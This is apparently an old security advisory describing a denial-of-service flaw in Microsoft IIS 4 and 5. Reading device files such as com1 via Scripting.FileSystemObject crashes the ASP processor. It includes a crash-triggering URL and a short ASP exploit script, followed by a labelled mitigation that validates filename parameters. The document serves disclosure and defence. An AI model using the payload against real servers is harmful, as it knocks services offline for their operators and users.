Vulnerability

IIS

Affected

MS IIS 4, 5

Description

VIPER_SV /nerf/team/ found the following. Opening and reading device files (com1, com2, etc.) using Scripting.FileSystemObject will crash the ASP processor (asp.dll). So, if you have permission to create an .asp file, you can crash the ASP processor.

Sometimes a filename is passed as a parameter to an ASP script, which opens and reads data from that file. Passing a device file as the parameter will crash the ASP processor:

    http://host.int/scripts/script.asp?script=com1

ASP-Exploit:

    <%
    Dim strFileName, objFSO, objFile
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    strFileName = "com1"
    Set objFile = objFSO.OpenTextFile(strFileName)
    Response.Write objFile.ReadAll
    objFile.Close
    %>

Solution

Fix Scripting.FileSystemObject (it has to check that the file exists before opening it).
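A script that takes a filename parameter, like the script.asp case in the description, can reject device names itself before any FileSystemObject call. The following is an added example, not part of the original advisory: SafeLeafName and IsDeviceName are hypothetical helper names, the device list is the standard Windows reserved set (wider than the com1/com2 named above), and the RegExp object assumes VBScript 5 or later.

```vbscript
<%
' Added example: validate the "script" parameter before opening the file.

' True when the name is a reserved DOS device, with or without an extension
' (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9; "com1.txt" still names the device).
Function IsDeviceName(ByVal strName)
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "^(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(\..*)?$"
    IsDeviceName = re.Test(strName)
End Function

' Returns the last path component, or "" when the value must be rejected.
Function SafeLeafName(ByVal strParam)
    Dim strLeaf, re
    SafeLeafName = ""
    ' Drop any directory part so only the leaf name is examined.
    strLeaf = Replace(strParam, "/", "\")
    strLeaf = Mid(strLeaf, InStrRev(strLeaf, "\") + 1)
    ' Allow-list: name or name.ext, no colons, spaces or trailing dots,
    ' so forms such as "COM1:" or "com1 " never reach the device check.
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)?$"
    If Not re.Test(strLeaf) Then Exit Function
    If IsDeviceName(strLeaf) Then Exit Function
    SafeLeafName = strLeaf
End Function

Dim strFileName, objFSO, objFile
strFileName = SafeLeafName(Request.QueryString("script"))
If strFileName = "" Then
    ' Refuse the request without touching FileSystemObject.
    Response.Status = "400 Bad Request"
    Response.End
End If

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile(Server.MapPath(strFileName))
Response.Write Server.HTMLEncode(objFile.ReadAll)
objFile.Close
%>
```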